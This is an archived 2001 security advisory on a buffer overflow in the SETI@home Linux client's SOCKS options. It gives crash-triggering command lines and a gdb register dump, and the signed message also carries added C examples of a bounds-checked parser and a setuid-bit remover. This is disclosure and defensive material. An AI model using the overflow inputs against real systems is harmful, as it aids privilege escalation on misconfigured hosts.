Vulnerability in SETI@home

From: joetestaat_private
Date: Sun Dec 02 2001 - 15:15:44 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    
    Vulnerability in SETI@home
    
    
    
        Overview
    
    SETI@home (http://setiathome.berkeley.edu/) is a distributed project that
    allows ordinary citizens to participate in the search for extraterrestrial
    intelligence using their computer's idle time.  A buffer overflow exists
    in the UNIX client software.
    
    NOTE:  this vulnerability is NOT exploitable in the default installation.
    
    
    
        Details
    
    The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
    possibly others) is vulnerable to buffer overflow.  Example:
    
    
    # ./setiathome -version
    SETI@home client.
    Platform: i386-pc-linux-gnu-gnulibc2.1
    Version: 3.03
    
    ...
    ...
    
    # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
    Segmentation fault
    # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
    Segmentation fault
    # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
    Segmentation fault
    #
    
    [root@seti /home/setiathome]# gdb setiathome
    GNU gdb 5.0rh-5 Red Hat Linux 7.1
    Copyright 2001 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (no debugging symbols found)...
    (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
    Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'`
    
    Program received signal SIGSEGV, Segmentation fault.
    0x2ab4d409 in strcpy () from /lib/libc.so.6
    (gdb) info registers
    eax            0x0      0
    ecx            0x40404040       1077952576
    edx            0x41414141       1094795585
    ebx            0xfefefeff       -16843009
    esp            0x7fffe664       0x7fffe664
    ebp            0x7fffe6bc       0x7fffe6bc
    esi            0x7ffffe28       2147483176
    edi            0x807bffd        134725629
    eip            0x2ab4d409       0x2ab4d409
    eflags         0x10246  66118
    cs             0x23     35
    ss             0x2b     43
    ds             0x2b     43
    es             0x2b     43
    fs             0x0      0
    gs             0x0      0
    fctrl          0x37f    895
    fstat          0x0      0
    ftag           0xffff   65535
    fiseg          0x0      0
    fioff          0x0      0
    foseg          0x0      0
    fooff          0x0      0
    fop            0x0      0
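    The crash above lands inside strcpy() with 0x41414141 in a register, which is
    the classic signature of an unbounded copy of a command-line value into a
    fixed-size buffer.  The following is an added illustration, not the SETI@home
    client's code: the buffer sizes, the struct and the parse_socks_args()
    function are assumptions chosen for the example.  It shows the unchecked
    pattern next to a hardened option parser that rejects over-long values
    instead of copying them.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer sizes; the real client's sizes are not known from the advisory. */
#define SOCKS_SERVER_MAX 256
#define SOCKS_USER_MAX   64
#define SOCKS_PASSWD_MAX 64

struct socks_config {
    char server[SOCKS_SERVER_MAX];
    char user[SOCKS_USER_MAX];
    char passwd[SOCKS_PASSWD_MAX];
};

/* Vulnerable pattern (shown for contrast, never called here): strcpy() trusts
   the caller-supplied length, so an argv value longer than dst overruns the stack. */
static void store_option_unchecked(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened: fail closed when the value does not fit, including the trailing NUL. */
int store_option_checked(char *dst, size_t dst_size, const char *src) {
    size_t len;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size)          /* need len + 1 bytes for the terminator */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Parse -socks_server / -socks_user / -socks_passwd from argv into cfg.
   Returns 0 on success, -1 if a value is missing or too long.  Unknown
   options are skipped, since the real client accepts many others. */
int parse_socks_args(int argc, char **argv, struct socks_config *cfg) {
    int i;
    memset(cfg, 0, sizeof(*cfg));
    for (i = 1; i < argc; i++) {
        char *dst = NULL;
        size_t cap = 0;
        if (strcmp(argv[i], "-socks_server") == 0) { dst = cfg->server; cap = sizeof(cfg->server); }
        else if (strcmp(argv[i], "-socks_user") == 0) { dst = cfg->user; cap = sizeof(cfg->user); }
        else if (strcmp(argv[i], "-socks_passwd") == 0) { dst = cfg->passwd; cap = sizeof(cfg->passwd); }
        if (dst == NULL)
            continue;
        if (i + 1 >= argc)        /* option given without a value */
            return -1;
        if (store_option_checked(dst, cap, argv[i + 1]) != 0)
            return -1;
        i++;                      /* consume the value */
    }
    (void)store_option_unchecked; /* referenced only so the contrast function is not flagged unused */
    return 0;
}

int main(int argc, char **argv) {
    struct socks_config cfg;
    if (parse_socks_args(argc, argv, &cfg) != 0) {
        fprintf(stderr, "invalid or over-long SOCKS option\n");
        return 1;
    }
    printf("socks server=\"%s\" user=\"%s\"\n", cfg.server, cfg.user);
    return 0;
}
```

    With the checked version, the 5604-byte argument from the advisory is
    rejected with an error instead of overwriting the stack; the process never
    reaches a strcpy() it cannot bound.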
    
    
    
        Solution
    
    The SETI@home UNIX client is not installed with a setuid bit by default.
    If one was added to it -- perhaps to run it under a 'setiathome' account --
    remove it immediately.
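    The fix above is a file-mode check: the overflow only matters for privilege
    escalation if the binary runs with a setuid bit that an administrator added.
    The following is an added example, not part of the advisory, that performs
    that check and the remediation (`chmod u-s`) from C; the path argument is
    whatever the local setiathome binary is, which the example takes from argv.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Return 1 if path carries the setuid bit, 0 if it does not, -1 if stat() fails. */
int has_setuid_bit(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Clear the setuid bit, leaving every other permission bit as it was.
   Equivalent to `chmod u-s path`.  Returns 0 on success, -1 on error. */
int strip_setuid_bit(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if (!(st.st_mode & S_ISUID))
        return 0;                               /* nothing to do */
    return chmod(path, (st.st_mode & 07777) & ~S_ISUID) == 0 ? 0 : -1;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s /path/to/setiathome\n", argv[0]);
        return 2;
    }
    switch (has_setuid_bit(argv[1])) {
    case 1:
        printf("%s is setuid; clearing the bit\n", argv[1]);
        return strip_setuid_bit(argv[1]) == 0 ? 0 : 1;
    case 0:
        printf("%s is not setuid (the default installation)\n", argv[1]);
        return 0;
    default:
        perror("stat");
        return 1;
    }
}
```

    Run it against the installed client binary; a non-default setuid bit is
    reported and removed, which confines any overflow in option handling to
    the invoking user's own privileges.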
    
    
    
        Vendor Status
    
    The project director, Dr. Dave P. Anderson, was contacted via
    <daveaat_private> on Monday, Nov 5th.  He promptly replied that
    this problem will be fixed in the next release.
    
    
    
    
        - Joe Testa
    
    e-mail:   joetestaat_private
    web page: http://hogs.rit.edu/~joet/
    AIM:      LordSpankatron
    
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com
    
    wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
    AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
    =M4UW
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 16:31:41 PST